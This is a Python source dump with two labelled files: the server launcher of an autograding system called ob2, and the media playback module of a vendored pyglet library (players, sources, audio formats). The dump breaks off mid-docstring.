| source | python |
|---|---|
__main__.py
|
import logging
import signal
import sys
import traceback
from threading import Thread
import ob2.config as config
import ob2.dockergrader
import ob2.mailer
import ob2.repomanager
import ob2.web
from ob2.database.migrations import migrate
from ob2.database.validation import validate_database_constraints
from ob2.dockergrader import reset_grader
from ob2.mailer import mailer_queue
from ob2.repomanager import repomanager_queue
from ob2.util.config_data import validate_config
from ob2.database import DbCursor # noqa (for --ipython mode)
from ob2.util.github_api import _get_github_admin # noqa (for --ipython mode)
def main():
# Runs code in "functions.py" files, provided in configuration directories.
config.exec_custom_functions()
# Sets up logging
if config.debug_mode:
logging.getLogger().setLevel(logging.DEBUG)
logging.debug("Setting log level to DEBUG (debug_mode is enabled)")
# Set up graceful exit for SIGTERM (so finally clauses might have a chance to execute)
def handle_sigterm(*args):
logging.warning("Exiting due to SIGTERM")
sys.exit(0)
signal.signal(signal.SIGTERM, handle_sigterm)
# Validates constraints on the configuration data (does not touch database)
validate_config()
# Performs database migrations as needed
migrate()
# Validates constraints on the configuration data and database data in conjunction
validate_database_constraints()
if config.mode == "ipython":
# If we're running --ipython mode, STOP here (don't interfere with a server that may be
# running simultaneously). Launch the IPython shell and wait for user input.
import IPython
return IPython.embed()
elif config.mode == "server":
# Run ob2 in server mode.
#
# First, we clean up our resumable queues by re-enqueuing any half-completed transactions.
# Then, we reset the state of the local Docker daemon.
# Then, we start all our worker threads.
# Finally, the main thread goes to sleep until we receive a signal.
# Recovers the resumable queue used for the mailer thread (if mailer is enabled)
if config.mailer_enabled:
mailer_queue.recover()
# Recovers the resumable queue used for the GitHub API thread (if GitHub is NOT in read-only
# mode)
if not config.github_read_only_mode:
repomanager_queue.recover()
# Clears out stray Docker containers and images
reset_grader()
# Start background threads for all the apps
# Warning: Do not try to start more than 1 web thread. The web server is already threaded.
apps = [(ob2.dockergrader, 3),
(ob2.web, 1)]
if config.mailer_enabled:
apps.append((ob2.mailer, 1))
if not config.github_read_only_mode:
# The GitHub repo manager thread is only needed if GitHub is NOT in read-only mode
apps.append((ob2.repomanager, 1))
for app, num_workers in apps:
for _ in range(num_workers):
worker = Thread(target=app.main)
worker.daemon = True
worker.start()
# Wait until we're asked to quit
while True:
try:
signal.pause()
except (KeyboardInterrupt, SystemExit):
logging.warning("Shutting down... Goodbye world.")
break
except:
traceback.print_exc()
if __name__ == '__main__':
main()
|
__init__.py
|
# ----------------------------------------------------------------------------
# fos.lib.pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of fos.lib.pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
# $Id$
'''Audio and video playback.
pyglet can play WAV files, and if AVbin is installed, many other audio and
video formats.
Playback is handled by the `Player` class, which reads raw data from `Source`
objects and provides methods for pausing, seeking, adjusting the volume, and
so on. The `Player` class uses the best available audio device
(currently, only OpenAL is supported)::
player = Player()
A `Source` is used to decode arbitrary audio and video files. It is
associated with a single player by "queuing" it::
source = load('background_music.mp3')
player.queue(source)
Use the `Player` to control playback.
If the source contains video, the `Source.video_format` attribute will be
non-None, and the `Player.texture` attribute will contain the current video
image synchronised to the audio.
Decoding sounds can be processor-intensive and may introduce latency,
particularly for short sounds that must be played quickly, such as bullets or
explosions. You can force such sounds to be decoded and retained in memory
rather than streamed from disk by wrapping the source in a `StaticSource`::
bullet_sound = StaticSource(load('bullet.wav'))
The other advantage of a `StaticSource` is that it can be queued on any number
of players, and so played many times simultaneously.
'''
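# A minimal end-to-end sketch of the API described above (illustrative only,
# not executed on import; assumes decodable 'background_music.mp3' and
# 'bullet.wav' files exist on disk):
#
#   player = Player()
#   player.queue(load('background_music.mp3'))
#   player.play()
#
#   # Short sounds can be decoded up front and queued on many players:
#   bullet_sound = StaticSource(load('bullet.wav'))
#   bullet_sound.play()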
__docformat__ = 'restructuredtext'
__version__ = '$Id$'
import atexit
import ctypes
import heapq
import sys
import threading
import time
import fos.lib.pyglet
from fos.lib.pyglet.compat import bytes_type, BytesIO
_debug = fos.lib.pyglet.options['debug_media']
class MediaException(Exception):
pass
class MediaFormatException(MediaException):
pass
class CannotSeekException(MediaException):
pass
class MediaThread(object):
'''A thread that cleanly exits on interpreter shutdown, and provides
a sleep method that can be interrupted and a termination method.
:Ivariables:
`condition` : threading.Condition
Lock condition on all instance variables.
`stopped` : bool
True if `stop` has been called.
'''
_threads = set()
_threads_lock = threading.Lock()
def __init__(self, target=None):
self._thread = threading.Thread(target=self._thread_run)
self._thread.setDaemon(True)
if target is not None:
self.run = target
self.condition = threading.Condition()
self.stopped = False
@classmethod
def _atexit(cls):
cls._threads_lock.acquire()
threads = list(cls._threads)
cls._threads_lock.release()
for thread in threads:
thread.stop()
def run(self):
pass
def _thread_run(self):
if fos.lib.pyglet.options['debug_trace']:
fos.lib.pyglet._install_trace()
self._threads_lock.acquire()
self._threads.add(self)
self._threads_lock.release()
self.run()
self._threads_lock.acquire()
self._threads.remove(self)
self._threads_lock.release()
def start(self):
self._thread.start()
def stop(self):
'''Stop the thread and wait for it to terminate.
The `stopped` instance variable is set to ``True`` and the condition is
notified. It is the responsibility of the `run` method to check
the value of `stopped` after each sleep or wait and to return if set.
'''
if _debug:
print 'MediaThread.stop()'
self.condition.acquire()
self.stopped = True
self.condition.notify()
self.condition.release()
self._thread.join()
def sleep(self, timeout):
'''Wait for some amount of time, or until notified.
:Parameters:
`timeout` : float
Time to wait, in seconds.
'''
if _debug:
print 'MediaThread.sleep(%r)' % timeout
self.condition.acquire()
self.condition.wait(timeout)
self.condition.release()
def notify(self):
'''Interrupt the current sleep operation.
If the thread is currently sleeping, it will be woken immediately,
instead of waiting the full duration of the timeout.
'''
if _debug:
print 'MediaThread.notify()'
self.condition.acquire()
self.condition.notify()
self.condition.release()
atexit.register(MediaThread._atexit)
class WorkerThread(MediaThread):
def __init__(self, target=None):
super(WorkerThread, self).__init__(target)
self._jobs = []
def run(self):
while True:
job = self.get_job()
if not job:
break
job()
def get_job(self):
self.condition.acquire()
while self._empty() and not self.stopped:
self.condition.wait()
if self.stopped:
result = None
else:
result = self._get()
self.condition.release()
return result
def put_job(self, job):
self.condition.acquire()
self._put(job)
self.condition.notify()
self.condition.release()
def clear_jobs(self):
self.condition.acquire()
self._clear()
self.condition.notify()
self.condition.release()
def _empty(self):
return not self._jobs
def _get(self):
return self._jobs.pop(0)
def _put(self, job):
self._jobs.append(job)
def _clear(self):
del self._jobs[:]
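# Illustrative sketch of the WorkerThread job protocol above (the job callable
# is hypothetical; not executed on import): jobs are plain callables, get_job()
# blocks on `condition` until put_job() notifies or stop() sets `stopped`.
#
#   worker = WorkerThread()
#   worker.start()
#   worker.put_job(lambda: refill_audio_buffer())  # hypothetical callable
#   worker.clear_jobs()                            # drop anything still queued
#   worker.stop()                                  # get_job() returns None, run() exits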
class AudioFormat(object):
'''Audio details.
An instance of this class is provided by sources with audio tracks. You
should not modify the fields, as they are used internally to describe the
format of data provided by the source.
:Ivariables:
`channels` : int
The number of channels: 1 for mono or 2 for stereo (fos.lib.pyglet does
not yet support surround-sound sources).
`sample_size` : int
Bits per sample; only 8 or 16 are supported.
`sample_rate` : int
Samples per second (in Hertz).
'''
def __init__(self, channels, sample_size, sample_rate):
self.channels = channels
self.sample_size = sample_size
self.sample_rate = sample_rate
# Convenience
self.bytes_per_sample = (sample_size >> 3) * channels
self.bytes_per_second = self.bytes_per_sample * sample_rate
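# Worked example: CD-quality stereo, AudioFormat(channels=2, sample_size=16,
# sample_rate=44100), gives bytes_per_sample = (16 >> 3) * 2 = 4 and
# bytes_per_second = 4 * 44100 = 176400.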
def __eq__(self, other):
return (self.channels == other.channels and
self.sample_size == other.sample_size and
self.sample_rate == other.sample_rate)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '%s(channels=%d, sample_size=%d, sample_rate=%d)' % (
self.__class__.__name__, self.channels, self.sample_size,
self.sample_rate)
class VideoFormat(object):
'''Video details.
An instance of this class is provided by sources with a video track. You
should not modify the fields.
Note that the sample aspect has no relation to the aspect ratio of the
video image. For example, a video image of 640x480 with sample aspect 2.0
should be displayed at 1280x480. It is the responsibility of the
application to perform this scaling.
:Ivariables:
`width` : int
Width of video image, in pixels.
`height` : int
Height of video image, in pixels.
`sample_aspect` : float
Aspect ratio (width over height) of a single video pixel.
`frame_rate` : float
Frame rate (frames per second) of the video.
AVbin 8 or later is required, otherwise the frame rate will be
``None``.
**Since:** fos.lib.pyglet 1.2.
'''
def __init__(self, width, height, sample_aspect=1.0):
self.width = width
self.height = height
self.sample_aspect = sample_aspect
self.frame_rate = None
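# Worked example of the sample-aspect scaling described in the docstring:
# VideoFormat(640, 480, sample_aspect=2.0) describes a frame that should be
# presented at 640 * 2.0 x 480 = 1280x480; the scaling itself is left to the
# application.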
class AudioData(object):
'''A single packet of audio data.
This class is used internally by fos.lib.pyglet.
:Ivariables:
`data` : str or ctypes array or pointer
Sample data.
`length` : int
Size of sample data, in bytes.
`timestamp` : float
Time of the first sample, in seconds.
`duration` : float
Total data duration, in seconds.
`events` : list of MediaEvent
List of events contained within this packet. Events are
timestamped relative to this audio packet.
'''
def __init__(self, data, length, timestamp, duration, events):
self.data = data
self.length = length
self.timestamp = timestamp
self.duration = duration
self.events = events
def consume(self, bytes, audio_format):
'''Remove some data from beginning of packet. All events are
cleared.'''
self.events = ()
if bytes == self.length:
self.data = None
self.length = 0
self.timestamp += self.duration
self.duration = 0.
return
elif bytes == 0:
return
if not isinstance(self.data, str):
# XXX Create a string buffer for the whole packet then
# chop it up. Could do some pointer arith here and
# save a bit of data pushing, but my guess is this is
# faster than fudging around with ctypes (and easier).
data = ctypes.create_string_buffer(self.length)
ctypes.memmove(data, self.data, self.length)
self.data = data
self.data = self.data[bytes:]
self.length -= bytes
self.duration -= bytes / float(audio_format.bytes_per_second)
self.timestamp += bytes / float(audio_format.bytes_per_second)
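# Worked example: with the 176400 bytes/second format above, consume(88200,
# audio_format) discards the first 0.5 s of the packet: length shrinks by
# 88200 bytes, duration decreases by 0.5 and timestamp advances by 0.5.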
def get_string_data(self):
'''Return data as a string. (Python 3: return as bytes)'''
if isinstance(self.data, bytes_type):
return self.data
buf = ctypes.create_string_buffer(self.length)
ctypes.memmove(buf, self.data, self.length)
return buf.raw
class MediaEvent(object):
def __init__(self, timestamp, event, *args):
# The meaning of the timestamp depends on context; it is not seen by the
# application.
self.timestamp = timestamp
self.event = event
self.args = args
def _sync_dispatch_to_player(self, player):
fos.lib.pyglet.app.platform_event_loop.post_event(player, self.event, *self.args)
time.sleep(0)
# TODO sync with media.dispatch_events
def __repr__(self):
return '%s(%r, %r, %r)' % (self.__class__.__name__,
self.timestamp, self.event, self.args)
class SourceInfo(object):
'''Source metadata information.
Fields are the empty string or zero if the information is not available.
:Ivariables:
`title` : str
Title
`author` : str
Author
`copyright` : str
Copyright statement
`comment` : str
Comment
`album` : str
Album name
`year` : int
Year
`track` : int
Track number
`genre` : str
Genre
:since: fos.lib.pyglet 1.2
'''
title = ''
author = ''
copyright = ''
comment = ''
album = ''
year = 0
track = 0
genre = ''
class Source(object):
'''An audio and/or video source.
:Ivariables:
`audio_format` : `AudioFormat`
Format of the audio in this source, or None if the source is
silent.
`video_format` : `VideoFormat`
Format of the video in this source, or None if there is no
video.
`info` : `SourceInfo`
Source metadata such as title, artist, etc; or None if the
information is not available.
**Since:** fos.lib.pyglet 1.2
'''
_duration = None
audio_format = None
video_format = None
info = None
def _get_duration(self):
return self._duration
duration = property(lambda self: self._get_duration(),
doc='''The length of the source, in seconds.
Not all source durations can be determined; in this case the value
is None.
Read-only.
:type: float
''')
def play(self):
'''Play the source.
This is a convenience method which creates a ManagedSoundPlayer for
this source and plays it immediately.
:rtype: `ManagedSoundPlayer`
'''
player = ManagedSoundPlayer()
player.queue(self)
player.play()
return player
def get_animation(self):
'''Import all video frames into memory as an `Animation`.
An empty animation will be returned if the source has no video.
Otherwise, the animation will contain all unplayed video frames (the
entire source, if it has not been queued on a player). After creating
the animation, the source will be at EOS.
This method is unsuitable for videos running longer than a
few seconds.
:since: fos.lib.pyglet 1.1
:rtype: `pyglet.image.Animation`
'''
from fos.lib.pyglet.image import Animation, AnimationFrame
if not self.video_format:
return Animation([])
else:
frames = []
last_ts = 0
next_ts = self.get_next_video_timestamp()
while next_ts is not None:
image = self.get_next_video_frame()
if image is not None:
delay = next_ts - last_ts
frames.append(AnimationFrame(image, delay))
last_ts = next_ts
next_ts = self.get_next_video_timestamp()
return Animation(frames)
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:since: fos.lib.pyglet 1.1
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
pass
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:since: fos.lib.pyglet 1.1
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
pass
# Internal methods that SourceGroup calls on the source:
def seek(self, timestamp):
'''Seek to given timestamp.'''
raise CannotSeekException()
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
return self
def get_audio_data(self, bytes):
'''Get next packet of audio data.
:Parameters:
`bytes` : int
Maximum number of bytes of data to return.
:rtype: `AudioData`
:return: Next packet of audio data, or None if there is no (more)
data.
'''
return None
class StreamingSource(Source):
'''A source that is decoded as it is being played, and can only be
queued once.
'''
_is_queued = False
is_queued = property(lambda self: self._is_queued,
doc='''Determine if this source has been queued
on a `Player` yet.
Read-only.
:type: bool
''')
def _get_queue_source(self):
'''Return the `Source` to be used as the queue source for a player.
Default implementation returns self.'''
if self._is_queued:
raise MediaException('This source is already queued on a player.')
self._is_queued = True
return self
class StaticSource(Source):
'''A source that has been completely decoded in memory. This source can
be queued onto multiple players any number of times.
'''
def __init__(self, source):
'''Construct a `StaticSource` for the data in `source`.
:Parameters:
`source` : `Source`
The source to read and decode audio and video data from.
'''
source = source._get_queue_source()
if source.video_format:
raise NotImplementedError(
'Static sources not supported for video yet.')
self.audio_format = source.audio_format
if not self.audio_format:
return
# Arbitrary: number of bytes to request at a time.
buffer_size = 1 << 20 # 1 MB
# Naive implementation. Driver-specific implementations may override
# to load static audio data into device (or at least driver) memory.
data = BytesIO()
while True:
audio_data = source.get_audio_data(buffer_size)
if not audio_data:
break
data.write(audio_data.get_string_data())
self._data = data.getvalue()
self._duration = len(self._data) / \
float(self.audio_format.bytes_per_second)
def _get_queue_source(self):
return StaticMemorySource(self._data, self.audio_format)
def get_audio_data(self, bytes):
raise RuntimeError('StaticSource cannot be queued.')
class StaticMemorySource(StaticSource):
'''Helper class for default implementation of `StaticSource`. Do not use
directly.'''
def __init__(self, data, audio_format):
'''Construct a memory source over the given data buffer.
'''
self._file = BytesIO(data)
self._max_offset = len(data)
self.audio_format = audio_format
self._duration = len(data) / float(audio_format.bytes_per_second)
def seek(self, timestamp):
offset = int(timestamp * self.audio_format.bytes_per_second)
# Align to sample
if self.audio_format.bytes_per_sample == 2:
offset &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
offset &= 0xfffffffc
self._file.seek(offset)
def get_audio_data(self, bytes):
offset = self._file.tell()
timestamp = float(offset) / self.audio_format.bytes_per_second
# Align to sample size
if self.audio_format.bytes_per_sample == 2:
bytes &= 0xfffffffe
elif self.audio_format.bytes_per_sample == 4:
bytes &= 0xfffffffc
data = self._file.read(bytes)
if not len(data):
return None
duration = float(len(data)) / self.audio_format.bytes_per_second
return AudioData(data, len(data), timestamp, duration, [])
class SourceGroup(object):
'''Read data from a queue of sources, with support for looping. All
sources must share the same audio format.
:Ivariables:
`audio_format` : `AudioFormat`
Required audio format for queued sources.
'''
# TODO can sources list go empty? what behaviour (ignore or error)?
_advance_after_eos = False
_loop = False
def __init__(self, audio_format, video_format):
self.audio_format = audio_format
self.video_format = video_format
self.duration = 0.
self._timestamp_offset = 0.
self._dequeued_durations = []
self._sources = []
def seek(self, time):
if self._sources:
self._sources[0].seek(time)
def queue(self, source):
source = source._get_queue_source()
assert(source.audio_format == self.audio_format)
self._sources.append(source)
self.duration += source.duration
def has_next(self):
return len(self._sources) > 1
def next(self, immediate=True):
if immediate:
self._advance()
else:
self._advance_after_eos = True
def get_current_source(self):
if self._sources:
return self._sources[0]
def _advance(self):
if self._sources:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
old_source = self._sources.pop(0)
self.duration -= old_source.duration
def _get_loop(self):
return self._loop
def _set_loop(self, loop):
self._loop = loop
loop = property(_get_loop, _set_loop,
doc='''Loop the current source indefinitely or until
`next` is called. Initially False.
:type: bool
''')
def get_audio_data(self, bytes):
'''Get next audio packet.
:Parameters:
`bytes` : int
Hint for preferred size of audio packet; may be ignored.
:rtype: `AudioData`
:return: Audio data, or None if there is no more data.
'''
data = self._sources[0].get_audio_data(bytes)
eos = False
while not data:
eos = True
if self._loop and not self._advance_after_eos:
self._timestamp_offset += self._sources[0].duration
self._dequeued_durations.insert(0, self._sources[0].duration)
self._sources[0].seek(0)
else:
self._advance_after_eos = False
# Advance source if there's something to advance to.
# Otherwise leave last source paused at EOS.
if len(self._sources) > 1:
self._advance()
else:
return None
data = self._sources[0].get_audio_data(bytes) # TODO method rename
data.timestamp += self._timestamp_offset
if eos:
if _debug:
print 'adding on_eos event to audio data'
data.events.append(MediaEvent(0, 'on_eos'))
return data
def translate_timestamp(self, timestamp):
'''Get source-relative timestamp for the audio player's timestamp.'''
# XXX
if timestamp is None:
return None
timestamp = timestamp - self._timestamp_offset
if timestamp < 0:
for duration in self._dequeued_durations[::-1]:
timestamp += duration
if timestamp > 0:
break
assert timestamp >= 0, 'Timestamp beyond dequeued source memory'
return timestamp
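# Worked example: after two 10-second sources have been dequeued,
# _timestamp_offset is 20.0, so an audio player time of 25.0 maps to 5.0
# seconds into the current source; a time of 19.5 goes negative after the
# subtraction and is folded back into the previously dequeued source,
# yielding 9.5.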
def get_next_video_timestamp(self):
'''Get the timestamp of the next video frame.
:rtype: float
:return: The next timestamp, or ``None`` if there are no more video
frames.
'''
# TODO track current video source independently from audio source for
# better prebuffering.
timestamp = self._sources[0].get_next_video_timestamp()
if timestamp is not None:
timestamp += self._timestamp_offset
return timestamp
def get_next_video_frame(self):
'''Get the next video frame.
Video frames may share memory: the previous frame may be invalidated
or corrupted when this method is called unless the application has
made a copy of it.
:rtype: `pyglet.image.AbstractImage`
:return: The next video frame image, or ``None`` if the video frame
could not be decoded or there are no more video frames.
'''
return self._sources[0].get_next_video_frame()
class AbstractAudioPlayer(object):
'''Base class for driver audio players.
'''
def __init__(self, source_group, player):
'''Create a new audio player.
:Parameters:
`source_group` : `SourceGroup`
Source group to play from.
`player` : `Player`
Player to receive EOS and video frame sync events.
'''
self.source_group = source_group
self.player = player
def play(self):
'''Begin playback.'''
raise NotImplementedError('abstract')
def stop(self):
'''Stop (pause) playback.'''
raise NotImplementedError('abstract')
def delete(self):
'''Stop playing and clean up all resources used by player.'''
raise NotImplementedError('abstract')
def _play_group(self, audio_players):
'''Begin simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
player.play()
def _stop_group(self, audio_players):
'''Stop simultaneous playback on a list of audio players.'''
# This should be overridden by subclasses for better synchrony.
for player in audio_players:
player.stop()
def clear(self):
'''Clear all buffered data and prepare for replacement data.
The player should be stopped before calling this method.
'''
raise NotImplementedError('abstract')
def get_time(self):
'''Return approximation of current playback time within current source.
Returns ``None`` if the audio player does not know what the playback
time is (for example, before any valid audio data has been read).
:rtype: float
:return: current play cursor time, in seconds.
'''
# TODO determine which source within group
raise NotImplementedError('abstract')
def set_volume(self, volume):
'''See `Player.volume`.'''
pass
def set_position(self, position):
'''See `Player.position`.'''
pass
def set_min_distance(self, min_distance):
'''See `Player.min_distance`.'''
pass
def set_max_distance(self, max_distance):
'''See `Player.max_distance`.'''
pass
def set_pitch(self, pitch):
'''See `Player.pitch`.'''
pass
def set_cone_orientation(self, cone_orientation):
'''See `Player.cone_orientation`.'''
pass
def set_cone_inner_angle(self, cone_inner_angle):
'''See `Player.cone_inner_angle`.'''
pass
def set_cone_outer_angle(self, cone_outer_angle):
'''See `Player.cone_outer_angle`.'''
pass
def set_cone_outer_gain(self, cone_outer_gain):
'''See `Player.cone_outer_gain`.'''
pass
class Player(fos.lib.pyglet.event.EventDispatcher):
'''High-level sound and video player.
'''
_last_video_timestamp = None
_texture = None
# Spatialisation attributes, preserved between audio players
_volume = 1.0
_min_distance = 1.0
_max_distance = 100000000.
_position = (0, 0, 0)
_pitch = 1.0
_cone_orientation = (0, 0, 1)
_cone_inner_angle = 360.
_cone_outer_angle = 360.
_cone_outer_gain = 1.
#: The player will pause when it reaches the end of the stream.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_PAUSE = 'pause'
#: The player will loop the current stream continuously.
#:
#: :deprecated: Use `SourceGroup.loop`
EOS_LOOP = 'loop'
#: The player will move on to the next queued stream when it reaches the
#: end of the current source. If there is no source queued, the player
#: will pause.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_NEXT = 'next'
#: The player will stop entirely; valid only for ManagedSoundPlayer.
#:
#: :deprecated: Use `SourceGroup.advance_after_eos`
EOS_STOP = 'stop'
#: :deprecated:
_eos_action = EOS_NEXT
def __init__(self):
# List of queued source groups
self._groups = []
self._audio_player = None
# Desired play state (not an indication of actual state).
self._playing = False
self._paused_time = 0.0
def queue(self, source):
if (self._groups and
source.audio_format == self._groups[-1].audio_format and
source.video_format == self._groups[-1].video_format):
self._groups[-1].queue(source)
else:
group = SourceGroup(source.audio_format, source.video_format)
group.queue(source)
self._groups.append(group)
self._set_eos_action(self._eos_action)
self._set_playing(self._playing)
def _set_playing(self, playing):
#stopping = self._playing and not playing
#starting = not self._playing and playing
self._playing = playing
source = self.source
if playing and source:
if not self._audio_player:
self._create_audio_player()
self._audio_player.play()
if source.video_format:
if not self._texture:
self._create_texture()
if self.source.video_format.frame_rate:
period = 1. / self.source.video_format.frame_rate
else:
period = 1. / 30.
fos.lib.pyglet.clock.schedule_interval(self.update_texture, period)
else:
if self._audio_player:
self._audio_player.stop()
fos.lib.pyglet.clock.unschedule(self.update_texture)
def play(self):
self._set_playing(True)
def pause(self):
self._set_playing(False)
if self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is not None:
self._paused_time = time
self._audio_player.stop()
def next(self):
if not self._groups:
return
group = self._groups[0]
if group.has_next():
group.next()
return
if self.source.video_format:
self._texture = None
fos.lib.pyglet.clock.unschedule(self.update_texture)
if self._audio_player:
self._audio_player.delete()
self._audio_player = None
del self._groups[0]
if self._groups:
self._set_playing(self._playing)
return
self._set_playing(False)
self.dispatch_event('on_player_eos')
def seek(self, time):
if _debug:
print 'Player.seek(%r)' % time
self._paused_time = time
self.source.seek(time)
if self._audio_player: self._audio_player.clear()
if self.source.video_format:
self._last_video_timestamp = None
self.update_texture(time=time)
def _create_audio_player(self):
assert not self._audio_player
assert self._groups
group = self._groups[0]
audio_format = group.audio_format
if audio_format:
audio_driver = get_audio_driver()
else:
audio_driver = get_silent_audio_driver()
self._audio_player = audio_driver.create_audio_player(group, self)
_class = self.__class__
def _set(name):
private_name = '_' + name
value = getattr(self, private_name)
if value != getattr(_class, private_name):
getattr(self._audio_player, 'set_' + name)(value)
_set('volume')
_set('min_distance')
_set('max_distance')
_set('position')
_set('pitch')
_set('cone_orientation')
_set('cone_inner_angle')
_set('cone_outer_angle')
_set('cone_outer_gain')
def _get_source(self):
if not self._groups:
return None
return self._groups[0].get_current_source()
source = property(_get_source)
playing = property(lambda self: self._playing)
def _get_time(self):
time = None
if self._playing and self._audio_player:
time = self._audio_player.get_time()
time = self._groups[0].translate_timestamp(time)
if time is None:
return self._paused_time
else:
return time
time = property(_get_time)
def _create_texture(self):
video_format = self.source.video_format
self._texture = fos.lib.pyglet.image.Texture.create(
video_format.width, video_format.height, rectangle=True)
self._texture = self._texture.get_transform(flip_y=True)
self._texture.anchor_y = 0
def get_texture(self):
return self._texture
def seek_next_frame(self):
'''Step forwards one video frame in the current Source.
'''
time = self._groups[0].get_next_video_timestamp()
if time is None:
return
self.seek(time)
def update_texture(self, dt=None, time=None):
if time is None:
time = self._audio_player.get_time()
if time is None:
return
if (self._last_video_timestamp is not None and
time <= self._last_video_timestamp):
return
ts = self._groups[0].get_next_video_timestamp()
while ts is not None and ts < time:
self._groups[0].get_next_video_frame() # Discard frame
ts = self._groups[0].get_next_video_timestamp()
if ts is None:
self._last_video_timestamp = None
return
image = self._groups[0].get_next_video_frame()
if image is not None:
if self._texture is None:
self._create_texture()
self._texture.blit_into(image, 0, 0, 0)
self._last_video_timestamp = ts
def _set_eos_action(self, eos_action):
''':deprecated:'''
assert eos_action in (self.EOS_NEXT, self.EOS_STOP,
self.EOS_PAUSE, self.EOS_LOOP)
self._eos_action = eos_action
for group in self._groups:
group.loop = eos_action == self.EOS_LOOP
group.advance_after_eos = eos_action == self.EOS_NEXT
eos_action = property(lambda self: self._eos_action,
_set_eos_action,
doc='''Set the behaviour of the player when it
reaches the end of the current source.
This must be one of the constants `EOS_NEXT`, `EOS_PAUSE`, `EOS_STOP` or
`EOS_LOOP`.
:deprecated: Use `SourceGroup.loop` and `SourceGroup.advance_after_eos`
:type: str
''')
def _player_property(name, doc=None):
private_name = '_' + name
set_name = 'set_' + name
def _player_property_set(self, value):
setattr(self, private_name, value)
if self._audio_player:
getattr(self._audio_player, set_name)(value)
def _player_property_get(self):
return getattr(self, private_name)
return property(_player_property_get, _player_property_set, doc=doc)
# TODO docstrings for these...
volume = _player_property('volume')
min_distance = _player_property('min_distance')
max_distance = _player_property('max_distance')
position = _player_property('position')
pitch = _player_property('pitch')
cone_orientation = _player_property('cone_orientation')
cone_inner_angle = _player_property('cone_inner_angle')
cone_outer_angle = _player_property('cone_outer_angle')
cone_outer_gain = _player_property('cone_outer_gain')
# Events
def on_player_eos(self):
'''The player ran out of sources.
:event:
'''
if _debug:
print 'Player.on_player_eos'
def on_source_group_eos(self):
'''The current source group ran out of data.
The default behaviour is to advance to the next source group if
possible.
:event:
'''
self.next()
if _debug:
print 'Player.on_source_group_eos'
def on_eos(self):
'''
:event:
'''
if _debug:
print 'Player.on_eos'
Player.register_event_type('on_eos')
Player.register_event_type('on_player_eos')
Player.register_event_type('on_source_group_eos')
class ManagedSoundPlayer(Player):
''':deprecated: Use `Player`'''
pass
class PlayerGroup(object):
'''Group of players that can be played and paused simultaneously.
:Ivariables:
`players` : list of `Player`
Players in this group.
'''
def __init__(self, players):
'''Create a player group for the given set of players.
All players in the group must currently not belong to any other
group.
:Parameters:
`players` : Sequence of `Player`
Players to add to this group.
'''
self.players = list(players)
def play(self):
'''Begin playing all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._play_group(audio_players)
for player in self.players:
player.play()
def pause(self):
'''Pause all players in the group simultaneously.
'''
audio_players = [p._audio_player \
for p in self.players if p._audio_player]
if audio_players:
audio_players[0]._stop_group(audio_players)
for player in self.players:
player.pause()
class AbstractAudioDriver(object):
def create_audio_player(self, source_group, player):
raise NotImplementedError('abstract')
def get_listener(self):
raise NotImplementedError('abstract')
class AbstractListener(object):
'''The listener properties for positional audio.
You can obtain the singleton instance of this class by calling
`AbstractAudioDriver.get_listener`.
'''
_volume = 1.0
_position = (0, 0, 0)
_forward_orientation = (0, 0, -1)
_up_orientation = (0, 1, 0)
def _set_volume(self, volume):
raise NotImplementedError('abstract')
volume = property(lambda self: self._volume,
lambda self, volume: self._set_volume(volume),
doc='''The master volume for sound playback.
All sound volumes are multiplied by this master volume before being
played. A value of 0 will silence playback (but still consume
resources). The nominal volume is 1.0.
:type: float
''')
def _set_position(self, position):
raise NotImplementedError('abstract')
position = property(lambda self: self._position,
lambda self, position: self._set_position(position),
doc='''The position of the listener in 3D space.
The position is given as a tuple of floats (x, y, z). The unit
defaults to meters, but can be modified with the listener
properties.
:type: 3-tuple of float
''')
def _set_forward_orientation(self, orientation):
raise NotImplementedError('abstract')
forward_orientation = property(lambda self: self._forward_orientation,
lambda self, o: self._set_forward_orientation(o),
doc='''A vector giving the direction the
listener is facing.
